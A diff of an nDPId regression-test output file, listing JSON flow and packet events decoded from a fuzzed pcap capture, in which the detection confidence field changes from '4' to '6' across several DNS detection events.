00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaRAAIAGJpLAqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -77,12 +77,12 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1120469620579,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaalAAIAGJo3AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1120469632829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1120469632829,"pkt":"ADBUADRWAODtAW69CABFAAA9aaoAAIARTbLAcgECwKgBAQqfADUAKUpe7dQBAAABgAAAUgAAA2Z0cAdlY2l0ZexlA2NvbQAAAQAB"} 
-00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecite?e.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecite?e.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1120469633828,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1120469633828,"pkt":"ADBUADRWEODtAW69CABFAAA9aasAAIARTbHAqAECwKgBAQqfADUAKUpe7dQBAAABAAAAAAAAA2Z0cAdlY2l0ZWxlA2NvbQAAAQAB"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecitele.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecitele.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1120469634840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1120469634840,"pkt":"AODtAW69ADBUADRWCABFAACaAABAAEARtv\/AqAEBwKgBAgA1Cp8Ahtfh7dSBgAABAAKzAgABA2Z0cLxlY2l0ZexlA2NvbQAAAQABwAwABQABAAAC9QAGA2Ruc8AQwC0AAQABAAAAIQAEk+oB\/cAQAAIAAQAAA0MAEQJucwViYXJhawNuZXQCaWwAwBAAAgABAAADQwACwC3ATwABAGoAAAARAATUljCp"} -00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": 
{"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}} +00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="} 00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469634896} 
@@ -141,55 +141,55 @@ 00414{"packet_event_id":1,"packet_event_name":"packet","packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469637833,"pkt":"\/\/\/\/\/7\/\/AODtAW69CABFAABeacMAAIARTIrAqAECwKgB\/wCJAIkAOluqhPEBEAABAAAAAAB0IEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1120469663172,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469663172,"pkt":"ADBUADRWAODtAW69CABFAABIacgAAIARTYnAqAECwIgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1120469664171,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469664171,"pkt":"ADBUADRWAODtAW69CABFAABIackAAIARTYjAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1120469666174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469666174,"pkt":"ADBUADRWAODtAW69CABFAABIacoAAIARpYfAqAECwKgBAQqiADUANFpNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1120469668178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469668178,"pkt":"ADBUADRWAODtAW69CABFAABIacsAAIARTYbAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhADA="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":104,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469672183} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":104,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469668178,"pkt":"ADBUADRWAODtAW7bCABFABFIacwAAIARTYXAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1120469680185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1120469680185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1120469680186,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469680186,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CqMAR8XBQdaAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRzBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-adds.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-adds.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1120469680188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1120469680188,"pkt":"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"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680447,"flow_last_seen":1120469680447,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469680447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":9587,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1120469680447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469680447,"pkt":"ADBUADRWAODtAW69CABFAABIRc8AAIARTYLAqAECwKgBAQqkJXMANFNK1tYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469681446,"flow_last_seen":1120469681446,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469681446,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1120469681446,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469681446,"pkt":"ADBUADRWAODtAW69CABFAABIadAAAIARTYHAqAECwKgBAQqkADUANFNK1tYBAAABAAB2AAAABF9zaXAEX3VkcAMlcwAJY3liZXJjaXR5AmRrAAAhAAE="} 
